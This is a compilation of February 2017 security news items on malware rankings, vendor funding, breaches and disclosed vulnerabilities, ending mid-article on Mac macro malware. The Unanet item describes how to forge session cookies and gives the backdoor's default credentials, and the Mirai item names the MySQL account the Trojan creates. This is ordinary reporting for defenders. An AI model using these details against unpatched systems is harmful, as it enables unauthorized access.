Check Point’s latest threat report shows that Conficker is now the fourth most active malware out there, with Kelihos, HackerDefender, and Cryptowall occupying the first three positions. Conficker was the top threat in the security firm’s Top 10 “Most Wanted” malware list for quite some time.
The current leader, Kelihos, is yet another long-standing threat, one that managed to withstand several takedown attempts. In August last year, Kelihos infections registered a spike and the botnet tripled in size overnight, a clear sign that the actors behind it were considering ramping up activity. The botnet uses peer-to-peer communications, with each individual node acting as a command and control center.
Although the botnet was focused mainly on spamming stock pump and dump schemes or pharmaceutical scams, it was seen dropping malware as well, including ransomware such as MarsJoke, Wildfire, and Troldesh, as well as Trojans, including Panda Zeus, Nymain and Kronos. Most recently, security researchers observed that Kelihos was also capable of infecting removable USB drives to spread to new hosts.
The second top malware family is the HackerDefender user-mode rootkit for Windows, which can be used to hide files, processes and registry keys, as well as to implement a backdoor and port redirector. The third Most Wanted malware in January was CryptoWall, a piece of file-encrypting ransomware that uses AES encryption and the Tor anonymity network.
Nemucod (JavaScript or VBScript downloader), RookieUA (info stealer), Nivdort (multipurpose bot also known as Bayrob), Zeus (banking Trojan), Ramnit (banking Trojan), and Necurs (spam botnet mainly associated with the distribution of Locky), round up the Top 10 Most Wanted malware list.
The mobile threat landscape registered changes as well last month, as the Triada modular backdoor for Android secured the first position on the Top 3 Most Wanted mobile threats. Detailed in March last year, Triada was considered the most advanced mobile malware to date.
HummingBad, an Android Trojan capable of establishing a persistent rootkit on a device and installing additional applications, dropped to the second position. Dubbed HummingWhale, a new variant of this malware was discovered a couple of weeks ago, after it managed to infect 20 apps in Google Play and supposedly infect millions of devices.
Hiddad, a piece of Android malware that repackages legitimate apps and then releases them to a third-party store, is currently the third “most wanted” mobile threat. The malware, security researchers note, was designed to display ads but can also be used to gain access to key security details built into the OS, thus enabling the attacker to obtain sensitive user data.
“The wide range of threats seen during January utilizes all available tactics in the infection chain to try and gain a foothold on enterprise networks. To counter this organizations need advanced threat prevention measures on networks, endpoints and mobile devices to stop malware at the pre-infection stage, to ensure that they are adequately secured against the latest threats,” Check Point concludes.
Israeli Startup Empow Raises $9 Million for U.S. Expansion
11.2.2017 securityweek IT
Israeli startup Empow Cyber Security announced on Thursday that it has raised $9 million in a Series A funding round. $8 million has come from private investors and $1 million from the Office of the Chief Scientist at the Israel Ministry of Economy. The money will be used primarily to expand the company's operations in North America.
Empow currently employs three staff in its Boston, Mass. office, which will be expanded, and a second office opened on the West Coast later in 2017. Both offices are sales and marketing for the U.S. market, with R&D remaining in Ramat Gan, Israel.
Empow provides a platform that unifies separate security defenses in a more efficient and effective manner than unwieldy SIEMs. It uses security abstraction to separate the security infrastructure into primary components it calls 'security particles'. These particles are then linked together using a common language that interacts with the APIs of the different security technologies, enabling the complete security infrastructure be viewed and treated as a single entity rather than a series of individual silos.
Without that cross-technology visibility, individual alerts from different technologies can easily be missed. A possible phishing alert in isolation could be ignored by analysts. A subtle possibility of credential misuse from a different technology could also be missed.
Empow concentrates on 'intent'. If it spots a phishing possibility in the email alerts, it knows what to look for in the network alerts; and ties the phishing and credential misuse into a threat warning for the analyst.
As new attack methodologies emerge, empow can be 'taught' to recognize the different indications in the different technologies of the customer's infrastructure. empow itself is vendor-neutral, so the infrastructure itself does not need to change -- empow's purpose is to make any infrastructure more efficient. This means it can work with any existing infrastructure, whether that is on-premise or in the cloud.
While customers can develop their own 'apps' to detect, investigate and mitigate new attack methodologies, empow also provides an app store for emerging and common issues. These currently include cross-technology indicators for threats such as ransomware, spear-phishing, privilege escalation and financial data leaks.
Avi Chesla, co-founder and CEO, explains, "Empow creates an enterprise security posture that is as robust and nimble as the attacks it aims to prevent. Our security abstraction is creating a radical change in the realm of cybersecurity, making cyber-defenses exponentially better than the sum of their parts. It's like a cyber general coordinating your security army: empow helps sends the right troops into battle at the right time."
Demisto Raises $20 Million to Help Enterprises Fight Alert Fatigue
11.2.2017 securityweek Security
Demisto, a Cupertino, Calif.-based maker of software that helps Security Operations teams fight “alert fatigue” and reduce the time to respond to a breach, announced on Thursday that it has closed a $20 million Series B round of funding.
In addition to announcing the new funding, the company introduced the latest version of its security operations platform. The company’s new “Demisto Enterprise 2.0 Security Operations Platform” is an incident management platform designed to help customers integrate threat feeds and manage indicators to automate threat hunting operations.
The platform is available now with annual pricing starting at $100,000 for up to two analysts.
“Demisto was built to make security analysts’ lives easier with its combined incident response case management and security orchestration platform,” said Slavik Markovich, CEO of Demisto.
“Demisto simplifies the way enterprises manage incident response with its automated and collaborative incident response platform that delivers unprecedented insight and resolution into complex threats,” explains Jay Leek, managing director at ClearSky and former CISO of Blackstone.
According to the company, the new funds will be used to expand operations and accelerate new product development and customer rollouts, and support sales and marketing efforts.
With offices in Silicon Valley and Tel Aviv, the new funding brings Demisto’s total funding to $26 million.
Research Unearths 5 Secrets for Higher Performing CISOs
11.2.2017 securityweek Security
IANS Research has developed a model designed to help chief information security officers to maintain their inherent promise: that is, "to safeguard critical assets across space and time."
This model, which it calls CISO Impact, rests on two fundamental capabilities: technical excellence and organizational engagement. The former involves eight domains from access control to incident response; while the later includes seven factors from running infosec like a business to getting Business to own the risk.
From this model, combined with insights from more than 1,200 high-performing CISOs and information security teams, IANS has developed what it terms 'The 5 Secrets of High-Performing CISOs'.
"The connected world is a dangerous place," says Stan Dolberg, chief research officer at IANS Research, "and because of this, CISOs and their teams must lead their organizations to adopt safe business practices. However, the challenge remains that many CISOs are leading from a position of little authority or influence. The CISO Impact diagnostic provides specific ways for CISOs to assert information security leadership skills that are commonly found in organizations one step ahead on the maturity curve. Our goal is to inform, contextualize and prioritize where to invest skills, practices, and technologies. Armed with this strong guidance, CISOs can chart their own paths to leadership."
Related: Learn More at SecurityWeek's 2017 CISO Forum
Put bluntly, the purpose of this report is to help lower performing CISOs to perform better through using the methods already used by high performing CISOs. The five secrets to achieving career success are:
Lead without authority
Embrace the change agent role
Don't wait to be invited to the party
Build a cohesive cyber cadre
It's a 5 to 7-year journey to high impact
Each of these 'secrets' is discussed in the report and supported by statistical research evidence. For example, 100% of high performers lead despite having no authority, using "persuasion, negotiation, conflict management, communication, education." Only 3% of low performers succeed in this.
For the second 'secret', the report states, "High-performing CISOs know the value of engaging to drive change," says the report. "In the CISO Impact data, 3 out of 4 of high performers embrace this approach, compared to 1 in 20 of the low performers. To embrace this role, know the business, know yourself, and get ready to 'make lemonade'."
The third secret is not so widely adopted by the high performers. "More than half of high performers in the CISO Impact data set didn't wait for executives to have an epiphany that security matters," states the report. "They leveraged the power of simulation to generate the emotional experience of loss or compromise that is fundamental to an engaged executive team." Less than 1% of low performers did similar.
In secret 4, "High performers patiently assemble and train more than a team -- they culture a cyber cadre." This approach is adopted by 85% of high performers; but by only 1.4% of low performers.
The fifth secret warns that there is no quick fix. "Five to seven years is a realistic time frame for building the trust, the program, the team, and the value of information security to the point where information security is baked in."
These five secrets provide excellent advice for improving company security and enhancing CISO careers. As stand-alone research, however, the report has several problems. The first is the distinction between a high performer and a low performer. The second is that it is easier to be a high performer in some companies than it is in others.
Martin Zinaich (CSSLP, CRISC, CISSP, CISA, CISM and more) is information security officer for the City of Tampa, comments: "'You must lead without authority' -- that is so very true! You have to do that both technically and from an organic business integration standpoint. Yet," he told SecurityWeek, "the study shows that 60% of high performing security leaders report into risk and business roles (that have authority) -- and 95% of lower performing CISOs report to the CIO (where they don't). Those two stats show the simple reality that it is very difficult to lead without authority. Almost every non-technical safe corporate wide business practice I have seen where the CISO is lacking authority has come via post breach, regulations or working with the Audit department."
The danger for research statistics is that some of the low performers could be high performers in a different company with more resources and/or a more receptive C-Suite.
A similar issue occurs in the fifth secret; that is, 'it's a 5 to 7-year journey to high impact'. The reality is that few CISOs will remain in one position for that long -- in fact, it is probably only the high performing CISOs already occupying a high-flying position with a security-aware company that will do so.
Such concerns, however, only impact the statistical difference between high and low performing security officers. The basic arguments contained within the five secrets remains quality advice for any CISO who wants to better secure his organization and improve his career potential.
The IANS Research report, "The 5 Secrets of High-Performing CISOs" will be presented at the RSA Conference next week.
Potentially Serious DoS Flaw Patched in BIND
11.2.2017 securityweek Vulnerebility
A potentially serious denial-of-service (DoS) vulnerability was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.
The flaw, tracked as CVE-2017-3135, affects BIND 9.8.8, all 9.9 releases since 9.9.3, all 9.10 releases, and all 9.11 releases.
In the case of servers with specific configurations, the vulnerability is remotely exploitable and rated as “high severity” with a CVSS score of 7.5.
“Under some conditions when using both DNS64 and RPZ [Response Policy Zones] to rewrite query responses, query processing can resume in an inconsistent state leading to either an INSIST assertion failure or an attempt to read through a NULL pointer,” ISC said in its advisory.
“Servers utilizing both DNS64 and RPZ are potentially susceptible to encountering this condition. When this condition occurs, it will result in either an INSIST assertion failure (and subsequent abort) or an attempt to read through a NULL pointer. On most platforms a NULL pointer read leads to a segmentation fault (SEGFAULT), which causes the process to be terminated,” ISC added.
Servers that don’t use RPZ and DNS64 at the same time are not affected by the security hole.
The vulnerability, reported by Ramesh Damodaran and Aliaksandr Shubnik of Infoblox, has been patched with the release of versions 9.9.9-P6, 9.10.4-P6 and 9.11.0-P3. Users have been advised to update their installations, but removing DNS64 or RPZ from the configuration or restricting the contents of the policy zone are considered a workaround.
The flaw was disclosed on Wednesday, but advance notifications were sent out on February 1. Linux distributions, most of which have classified this as a medium severity issue, are working on releasing patches.
Hackers Targeted Italy Foreign Ministry, Russia Accused
11.2.2017 securityweek Hacking
Rome - Italy's foreign ministry was attacked by hackers last year, a diplomatic source told AFP on Friday, amid reports that Russia could be to blame.
"After the first attack the system was immediately strengthened," said the source, who asked not to be named, after Britain's Guardian newspaper said the ministry had come under a sustained cyber offensive -- and officials suspected Russia.
Russia's foreign ministry said there were "no facts to prove this claim," according to Italian media reports.
The Italian source, who has close ties to the foreign ministry, said the attacks "did not affect the encrypted information system used to exchange the most sensitive information" but did affect "email accounts of ministry employees and the embassies".
The malware attack lasted over four months but did not affect then foreign minister Paolo Gentiloni -- Italy's current prime minister -- because he avoided using email during his mandate, the Guardian said.
Any sensitive information sent by email from the embassies would also have been protected because it would have been encrypted.
The daily said the hack was being investigated by Rome's chief prosecutor.
There have been concerns in recent weeks that Moscow has stepped up a cyber campaign against several European countries including Germany, France, Norway and the Netherlands.
Russia's alleged interference in the US presidential campaign last year by reputed hacking of Democratic Party computers and leaks of embarrassing communications raised fears the country may try to interfere in upcoming European elections.
Vícefaktorová autentizace jako mainstream
11.2.2017 SecurityWorld Zabezpečení
Stále více uživatelů používá pro svou identifikaci spíše otisk prstu než zadání hesla. Vícefaktorová autentizace (MFA, Multifactor Authentication) se totiž jeví jako jednodušší a bezpečnější. A navíc u ní neexistuje uložený seznam hesel, který by mohli útočníci ukrást. Jsou ale MFA už natolik propracované, aby se staly hlavním proudem?
V roce 2014 se USAA stala první finanční institucí, která zavedla rozpoznávání obličejů a hlasu do mobilní aplikace, prohlašuje Gary McAlum, tamější ředitel zabezpečení této společnosti. Rozpoznávání otisků prstů následovalo o pár měsíců později. A rok poté už měla USAA mezi svými pěti miliony uživatelů mobilní bankovní aplikace 1,1 milionu těch, kteří nativně využívali vícefaktorovou autentizaci.
„Současný model zabezpečení internetu je zastaralý a umírající. Je založen na informaci, která je známá (například vaše heslo nebo maskot na střední škole), ale vše už lze snadno zjistit – třeba pomocí úniků dat z Facebooku,“ poznamenává McAlum. „Odklon od ‚známé informace‘ je tedy naprosto nezbytný.“
„Téměř každá banka na světě používá jako alternativu vícefaktorovou autentizaci,“ tvrdí Avivah Litanová, analytička Gartneru. Po celá desetiletí se vícefaktorová autentizace využívala v podobě „bezpečnostního tokenu“, malého zařízení, které zobrazovalo jednorázové heslo, jež se každých několik minut měnilo. Bezpečnostní server banky měl stejný algoritmus a dokázal nejnovější správné heslo poznat.
„Vícefaktorová autentizace byla vždy příliš složitá a pro široké použití drahá,“ říká Jon Oltsik, bezpečnostní analytik společnosti Enterprise Strategy Group. „Co se nyní mění, je použití spotřebitelských technologií, především chytrých telefonů a rostoucí použití biometrických faktorů, jako jsou čtečky otisků prstů v chytrých telefonech.“
Definice faktorů
„Vícefaktorová autentizace je něco, co víte, něco, co máte, a něco, co jste, a používá přitom více než jeden z těchto faktorů,“ vysvětluje Michael Lynch, šéf strategií ve firmě InAuth, která se specializuje na problematiku autentizace.
„Něco, co víte, jsou přihlašovací údaje jako heslo. Něco, co máte, může být bezpečnostní token, avšak v případě mobilních telefonů jsou bezpečnostním tokenem právě tyto přístroje. Nebo to také může být počítač. Něco, co jste, je biometrie, například rozpoznávání otisku prstu, oční duhovky, hlasu nebo pulzu,“ vysvětlujeLynch.
Mezi další biometrické faktory, které se používají nebo se o nich uvažuje, patří srdeční tep, rychlost psaní na klávesnici, rozložení cév v bělmu oka nebo v kůži, způsob chůze, lokalita a vzorce dlouhodobého chování. Rozpoznávání oční duhovky ale vyžaduje kameru s funkcí infračerveného snímání.
V některých případech se využívá dvoufaktorové zabezpečení. Tradiční kombinace jména a hesla se obvykle počítá za jeden faktor a příslušné zařízení za ten druhý, popisuje Lynch. Novým trendem ale je (jako u USAA) použití mobilního zařízení jako jednoho z faktorů a biometrické vlastnosti detekované tímto zařízením jako druhého faktoru, aniž se musí použít heslo.
Lynch vysvětluje, že pro desktop lze použít tzv. otisk prohlížeče jako druhý faktor, který se vytvoří získáním informací o písmu, jazyku, aplikaci a typu prohlížeče.
„Tzv. otisk počítače se v průběhu času mění, jak se aplikace aktualizují a dochází k instalaci oprav, takže obvykle vydrží 60 dnů nebo i méně,“ což je důvodem, proč se mohou přihlašovací požadavky banky pro uživatele desktopu náhle změnit, vysvětluje Lynch a dodává, že kombinace souboru cookie a otisku prohlížeče je spolehlivější metodou.
Soubory cookie podle něj mohou vydržet stejně dlouho jako instalace prohlížeče, ale daný počítač je nemusí povolit.
„Druhý faktor však nemusíte vidět – banka téměř vždy kontroluje váš počítač přes soubor cookie,“ poznamenává Litanová. Pokud nerozpozná počítač, často pošle jednorázové heslo na mobilní telefon uživatele nebo na jeho e-mailovou adresu.
Co se týče biometrických faktorů pro mobilní zařízení, je „metoda ID využívající otisk prstu významná, protože už bývá často vestavěná, je pohodlná a uživatelé ji používají, není však lepší nebo horší než jiné metody ID,“ tvrdí Jim Ducharme, viceprezident bezpečnostní firmy RSA, která nově spadá pod Dell EMC.
Nižší popularita metod jako rozpoznávání hlasu či tváře je podle něj způsobovaná tím, že v mnoha případech nefungují – hlas v metru či tvář v nočním klubu.
Ve firmě USAA spoléhá cca 90 % jejích uživatelů na rozpoznávání otisků prstů, přičemž míra úspěšnosti přihlašování je pro otisky prstů i tváře vyšší než 90 procent, říká McAlum.
Přestože rozpoznávání hlasu více závisí na okolním prostředí, někteří uživatelé ho stále upřednostňují, dodává. (USAA nabízí i přístup pomocí kódu PIN pro případ, že by ostatní metody selhaly.)
Výběr faktoru pro použití však nezávisí vždy jen na technologii. „Na některých místech není přijatelné použít tvář jako identifikátor, protože tomu brání oblečení nebo někteří lidé považují oko za cestu k duši,“ vysvětluje Marc Boroditsky, viceprezident společnosti Authy, která dodává autentizační software.
Nemusejí se jim také z různých důvodů líbit snímače otisků prstů. V Brazílii si podle něj myslí, že to naznačuje kriminalitu. V některých částech Asie jsou zase lidé přesvědčeni, že je nečisté dotýkat se snímače otisků prstů.
„Vaše identita je osobní věc, a když začnete používat části osob pro identifikaci, zasahujete do něčeho s komplexními kulturními důsledky,“ dodává Boroditsky.
„S téměř každým biometrickým faktorem se také pojí otázka špehovanosti. Je zde děsivý aspekt detekce uživatelů bez jejich zapojení do procesu. Musíme být napřed a dát zákazníkům možnost volby. Například aby mohli vypnout zjišťování polohy a přidat další krok do procesu autentizace,“ tvrdí Boroditsky.
Windows Trojan Spreads Mirai to Linux Devices
10.2.2017 securityweek Virus
Mirai, the Linux-based malware that ensnared hundreds of thousands of Internet of Things (IoT) devices for launch one of the largest distributed denial of service (DDoS) botnets out there, has a Windows variant as well.
Mirai became popular last fall, after it targeted Brian Krebs’ blog and infrastructure provider Dyn in two of the largest DDoS attacks on record. Soon after, the malware’s source code leaked online and new variants of the Trojan were spotted, including one packing worm-like capabilities.
Although focused on Linux-based IoT devices until now, Mirai recently switched focus to Windows systems as well, Doctor Web security researchers warn. Detected as Trojan.Mirai.1, the new malware variant is written in C++ and appears capable of performing various nefarious operations, one of which involves the spreading of the Mirai botnet to Linux-based devices.
When launched on the infected Windows machine, the Trojan would connect to its command and control (C&C) server, and then download a configuration file to extract a list of IP addresses from it. Next, the malware launches a scanner to search for the network nodes listed in the configuration file, and attempts to login to them using a list of logins and passwords combinations from the same file.
According to Doctor Web’s security researchers, the Windows version of Mirai is capable of scanning and checking several TCP ports simultaneously (including 22, 23, 135, 445, 1433, 3306, and 3389).
As soon as it connects to one of the attack nodes (via any of the available protocols), the Trojan begins the execution of a series of commands indicated in the configuration file. However, should the connection be made via Remote Desktop Protocol (RDP), none of the instructions is executed.
What’s more, if the threat manages to connect to a Linux device via the Telnet protocol, it then attempts to download a binary file to it. This file is meant to subsequently download and launch the Mirai botnet.
The Windows version of Mirai can also abuse Windows Management Instrumentation (WMI) to execute commands on remote hosts, using inter-process communication (IPC) technology. The malware was designed to launch new processes with Win32_Process.Create method, and create various files (such as Windows package files containing a certain set of instructions).
If Microsoft SQL Server is present on the infected machine, the malware leverages it to spawn a series of files and a user that also has sysadmin privileges. Next, the malware abuses this user and the SQL server event service to execute various malicious tasks: to launch executable files with administrator privileges, delete files, or plant icons in the system folder for automatic launch (it can also create the corresponding logs in the Windows registry).
“After connecting to a remote MySQL server, the Trojan creates the user MySQL with the login phpminds and the password phpgod, for the purpose of achieving the same goals,” Doctor Web notes. This user has the following privileges: select, insert, update, delete, create, drop, reload, shutdown, process, file, grant, references, index, alter, show_db, super, create_tmp_table, lock_tables, execute, repl_slave, repl_client, create_view, show_view, create_routine, alter_routine, create_user, event, trigger, and create_tablespace.
Unanet Backdoor Allows Unauthenticated Access
10.2.2017 securityweek Virus
A backdoor found in the default configuration of the Unanet web application allows an unauthenticated attacker to login and manipulate user accounts and the roles they maintain.
Unanet provides end-to-end services automation, its web-based software enables the management of people and projects from a single database. According to the company, it offers “one look and feel, and one connected set of applications.”
The issue, Trustwave security researchers say, resides in a code branch within the Unanet product that maintains a hardcoded user, unlisted in the users table of the database. This user, they explain, was initially identified via a user enumeration vulnerability.
The user cannot login directly but, because session cookies within Unanet function in a vulnerable manner, with zero entropy and no session timeouts, anyone can bypass the need to authenticate with this user. The construction of a Unanet session cookie, the researchers explain, includes UserID, username in uppercase, roles concatenated together with '^', static cookie value, and digest.
What’s more, usernames and IDs were available via a user enumeration, because iterating the 'personkey' value would result in each username and id echoing into an error page that an attacker could parse to determine the list of existing usernames within the system.
Because user roles are known, since they exist within the 'Roles' tab in the preferences section, researchers managed to identify 19 roles within the environment, although they aren’t specifically associated with each user. However, researchers say that the possible permutations of users and roles can be brought down to around 5! permutations, meaning they can be determined using brute force attacks.
At this point, with the userID, usernames, and roles already discovered, all that an attacker needs to determine a Unanet session cookie is the special cookie value, which is referred to as a nonce, which, by default, is only used once. This, however, is a set to a default, although Unanet suggests it should be changed.
As long as the value hasn’t been changed, “the hidden cookie value can be brute forced offline, using the knowledge of all other values. This is true because the algorithm for generating the digest is known and when userID, username, roles, and digest are known it becomes a simple problem of solving for the single missing variable,” Trustwave security researchers explain.
User unanet (id 0), however, is not handled in the same way, and the researchers discovered that, if the personkey was zero, it would go to the makeadmin section, and that the method generated a new person 'unanet' and assigned the password 'UNANET' to it. Additionally, it called the 'setUnanetAdministrator(true)' method.
Armed with the UserID, Username, and the secret group __unanetAdministrator__, the researchers managed to generate the digest and reveal the cookie, and then to login using the user. The main issue, they say, is that anyone can use this method to access a Unanet system.
“This is not some deep, arcane issue. Anyone having access to a Unanet system is capable of generating the same conclusion via a simple code review. Additionally, even if the cookie 'nonce' was changed, any user of the system (or attacker who intercepts a request) is capable of brute forcing the new nonce offline. Currently any system that has not changed their cookie 'nonce' is vulnerable to an unauthenticated attacker being able to login with unanetAdministrator privileges,” the researchers mention.
At the moment, there are around 1600 public facing instances of Unanet that are potentially affected by this issue, Trustwave says. By exploiting the issue, an attacker could access the system and remove users, change roles, and create a new administrator. Using these privileges, the attacker can deny availability, comprise integrity, and remove confidentiality, the security researchers say.
The issue was patched in Unanet versions 10.0.51, 10.1.43, and 10.2.5.
Hundreds of Arby's Restaurants Hit by Card Breach
10.2.2017 securityweek Incindent
Arby’s Restaurant Group, one of the largest fast food sandwich restaurant chains in the United States, admitted this week that its payment processing systems had been breached by cybercriminals.
Arby’s told journalist Brian Krebs, who learned about the incident from sources in the financial industry, that it was alerted to the breach in mid-January by industry partners. The company said it had not disclosed the incident to the public at the FBI’s request.
The fast food chain said it immediately brought in Mandiant and other security experts to remove the malware from its systems and investigate the incident. The company is confident that the compromised systems have been cleaned up.
The investigation is ongoing, but the breach appears to have affected Arby’s corporate-owned restaurants and not franchised locations. Of Arby’s more than 3,300 stores in the U.S., over 1,000 are corporate restaurants, but not all of them are impacted.
It is unclear how many payment cards may have been stolen, but Krebs is aware of an alert from PSCU, a credit union service organization with over 800 members, which warned that more than 355,000 credit and debit cards issued by its members were compromised in a breach at a major fast food restaurant chain.
The PSCU alert estimated that the breach occurred between October 25, 2016 and January 19, 2017.
Arby’s is not the only major fast food restaurant chain targeted by cybercriminals. Wendy’s launched an investigation in January 2016 and initially determined that roughly 300 of its restaurants had been hit by a hacker attack that started in 2015.
Wendy’s later determined that the actual number of affected locations exceeded 1,000 and experts believe the incident affected hundreds of thousands of cards.
Cisco Launches "Umbrella" Secure Internet Gateway
10.2.2017 securityweek Safety
Cisco announced this week the launch of Umbrella, a cloud-based Secure Internet Gateway (SIG) solution designed to provide visibility and protection for devices on and outside the corporate network.
Organizations are increasingly relying on software-as-a-service (SaaS) products, such as WebEx, Office 365, Google Docs, Salesforce and Box. While these applications can significantly improve productivity, they are often used over untrusted Internet connections without being protected by a VPN.
Cisco wants to address this problem with the launch of Umbrella. The new cloud service aims to provide safe and secure access from anywhere, even if a VPN is not used.Cisco Umbrella
The networking giant obtained the Umbrella technology when it acquired OpenDNS in 2015. The company said the new product combines the original technology with machine learning models designed for uncovering threats and blocking malicious connections on the DNS and IP layers, Cisco Talos threat intelligence, and Advanced Malware Protection (AMP) technology for detecting and blocking malicious files in the cloud.
With Umbrella, Cisco promises enhanced visibility and control, including for sensitive data in SaaS applications via Cloudlock technology, and intelligence from the more than 100 billion requests resolved every day.
Cisco said the cloud-based SIG provides reliable and fast connectivity, and it can be easily integrated with existing appliances, intelligence platforms and custom tools.
“Umbrella was built upon the OpenDNS platform, a platform that has been delivered from the cloud since its inception. Then we integrated technology from across the Cisco security portfolio, including capabilities from the Cloud Web Security proxy, and the Advanced Malware Protection (AMP) file inspection,” said Brian Roddy, who oversees Cisco’s Cloud Security Business. “These technologies haven’t just been stitched together, but re-engineered to be delivered within Umbrella, so that they’re easy to use and able to deliver even more effective security.”
WordPress Flaw Exploited for Remote Code Execution
10.2.2017 securityweek Exploit
A recently patched WordPress vulnerability has been used to deface roughly 1.5 million web pages and experts have also started seeing attempts to exploit the flaw for remote code execution.
The flaw in question was patched on January 26 with the release of WordPress 4.7.2, but its existence was only disclosed one week later in an effort to give users enough time to update their installations.
The security hole affects the REST API and it has been described as a privilege escalation and content injection vulnerability. It allows attackers to modify the content of any post or page, and it can also be exploited for arbitrary PHP code execution.
Despite WordPress developers giving users a week to update their installations and working with service providers to block exploitation attempts, many websites that don’t have automatic updating enabled are still vulnerable to attacks.
A majority of the attacks spotted so far are part of defacement campaigns conducted by script kiddies looking to boost their online reputation. In the first days after exploits were made public, Sucuri researchers observed four campaigns in which more than 60,000 pages had been defaced.
The number has increased significantly and WordPress security firm WordFence reported on Thursday that it had spotted roughly 1.5 million defaced pages in attacks carried out by 20 different hackers.
WordFence pointed out that none of these hackers had managed to deface too many websites at once before the disclosure of this WordPress vulnerability. Several exploits have been used in the recent attacks and, in some cases, the attackers had found ways to bypass the rules deployed by firewall vendors.
While defacement attacks are not easy to monetize, researchers at Sucuri have started seeing other types of operations involving the REST API flaw.
The vulnerability cannot be directly used for code execution. However, WordPress plugins that allow users to insert PHP code directly into posts can be combined with the flaw to achieve this. Sucuri has seen exploitation attempts against websites that have plugins such as Insert PHP and Exec-PHP, both of which have over 100,000 active installs.
“Defacements don’t offer economic returns, so that will likely die soon,” explained Daniel Cid, founder and CTO of Sucuri. “What will remain are attempts to execute commands (RCE) as it gives the attackers full control of a site – and offers multiple ways to monetize – and SPAM SEO / affiliate link / ad injections. We are starting to see them being attempted on a few sites, and that will likely be the direction this vulnerability will be misused in the coming days, weeks and possibly months.”
Arby’s Restaurant Group confirmed a massive card breach hit its stores
10.2.2017 securityaffairs Incindent
Arby’s Restaurant Group, one of the largest fast food sandwich restaurant chains in the US, confirmed that its PoS systems had been breached by crooks.
Hundreds of Arby’s Restaurants suffered a card breach, the Arby’s Restaurant Group is the second-largest quick-service fast-food sandwich restaurant chain in the US. Arby’s has more than 3,330 stores in the United States, one-third of those is directly owned by the company.
Brian Krebs first learned about the card breach from its sources in the financial industry, later representatives from the group confirmed him the incident. Arby’s Restaurants discovered the security breach in the mid-January when it was alerted by industry partners.
“Sources at nearly a half-dozen banks and credit unions independently reached out over the past 48 hours to inquire if I’d heard anything about a data breach at Arby’s fast-food restaurants. Asked about the rumors, Arby’s told KrebsOnSecurity that it recently remediated a breach involving malicious software installed on payment card systems at hundreds of its restaurant locations nationwide.” wrote Brian Krebs
Why was the incident disclosed only now?
According to the company, the card breach was publicly disclosed only now due to an explicit request made by the FBI.
“A spokesperson for Atlanta, Ga.-based Arby’s said the company was first notified by industry partners in mid-January about a breach at some stores, but that it had not gone public about the incident at the request of the FBI.” continues Krebs.
“Arby’s Restaurant Group, Inc. (ARG) was recently provided with information that prompted it to launch an investigation of its payment card systems,” the company said in a written statement provided to KrebsOnSecurity.
“Upon learning of the incident, ARG immediately notified law enforcement and enlisted the expertise of leading security experts, including Mandiant,” their statement continued. “While the investigation is ongoing, ARG quickly took measures to contain this incident and eradicate the malware from systems at restaurants that were impacted.”
The company hired Mandiant and other security experts to remove sanitize its systems and investigate the card breach. At the time I was writing, the company confirmed that systems have been cleaned up.
“Although there are over 1,000 corporate Arby’s restaurants, not all of the corporate restaurants were affected,” said Christopher Fuller, Arby’s senior vice president of communications. “But this is the most important point: That we have fully contained and eradicated the malware that was on our point-of-sale systems.”
Crooks used a malware to compromise PoS systems at the Arby’s Restaurant Group, it is not clear how many payment cards may have been affected.
According to Krebs, who is aware of an alert from PSCU, more than 355,000 credit and debit cards issued by its members were compromised in a card breach at a major fast food restaurant chain.
The PSCU dated the card breach in the period between October 25, 2016 and January 19, 2017.
On July 2016, another major fast food restaurant chain suffered a card breach, the Wendy’s fast-food chain determined that roughly 1,000 of its restaurants had been breached by cyber criminals.
DDoS útoky se dostaly na své maximu
10.2.2017 SecurityWorld Počítačový útok
DDoS útoky zaznamenaly v posledních třech měsících roku 2016 značný pokrok -- novým trendem jsou ataky spuštěné prostřednictvím velkého počtu botnetů tvořených zranitelnými zařízeními internetu věcí (IoT).
Podle reportu společnosti Kaspersky Lab v průběhu posledního čtvrtletí minulého roku analytici zaznamenali botnetové DDoS útoky v 80 zemích, přičemž v předchozím kvartále jich bylo pouze 67.
Mezi 10 zeměmi, které zaznamenaly nejvíce DDoS obětí, došlo ke změně - Itálie a Nizozemí byly nahrazené Německem a Kanadou. Tři západoevropské země (Nizozemí, Velká Británie a Francie) zůstaly druhý kvartál v řadě mezi top 10 státy s nejvyšším počtem hostitelských C&C serverů, přičemž se k nim v posledním kvartále přidaly Bulharsko a Japonsko.
Nejdéle trvající DDoS útok v posledním čtvrtletí trval 292 hodin (přes 12 dní), což z něj udělalo rekordmana roku 2016. Nejvyšší počet DDoS útoků během jednoho dne se datuje na sobotu 5. listopadu.
Celkově se poslední tři měsíce roku 2016 nesly ve znamení neobvyklých DDoS útoků proti rozmanitým cílům, mezi něž se zařadily společnosti jako Dyn (doménový systém), Deutsche Telekom a některé velké ruské banky.
Tyto společnosti se staly prvními oběťmi nového trendu – DDoS útoky spuštěné prostřednictvím velkého počtu botnetů, které byly tvořeny zranitelnými zařízeními internetu věcí (IoT). Příkladem může být útok Mirai. Přístup, který zvolili tvůrci Mirai, posloužil jako základ mnoha dalším botnetům, které byly utvořeny z infikovaných IoT zařízení.
Narůstající počet útoků, jejichž součástí byly zařízení internetu věcí, byl jen jedním z trendů posledního čtvrtletí. V průběhu celých tří měsíců došlo ke značnému poklesu množství zesílených DDoS útoků, které byly hojně využívané v první polovině loňského roku. Důvodem může být lepší ochrana proti takovýmto útokům a méně zranitelných serverů, na které by mohli kyberzločinci cílit.
Mezeru po zesílených útocích rychle zaplnily útoky prostřednictvím aplikací, mezi něž se zařadily například útoky WordPress Pingback. Detekce útoků skrze aplikace představuje daleko složitější proces, protože útok napodobuje aktivity reálných uživatelů.
Hrozba je o to větší, že tyto útoky čím dál častěji využívají šifrování. To do velké míry zvyšuje efektivitu DDoS útoků, protože se jejich dešifrováním značně komplikuje proces filtrování závadných a pravých požadavků.
Watch Out! First-Ever Word Macro Malware for Apple Mac OS Discovered in the Wild
10.2.2017 thehackernews Apple
After targeting Windows-based computers over the past few years, hackers are now shifting their interest to Macs as well.
The emergence of the first macro-based Word document attack against Apple's macOS platform is the latest example to prove this.
The concept of Macros dates back to 1990s. You might be familiar with the message that reads: "Warning: This document contains macros."
Macro is a series of commands and actions that help automate some tasks. Microsoft Office programs support Macros written in Visual Basic for Applications (VBA), but they can also be used for malicious activities like installing malware.
Until now, hackers were cleverly using this technique to target Windows.
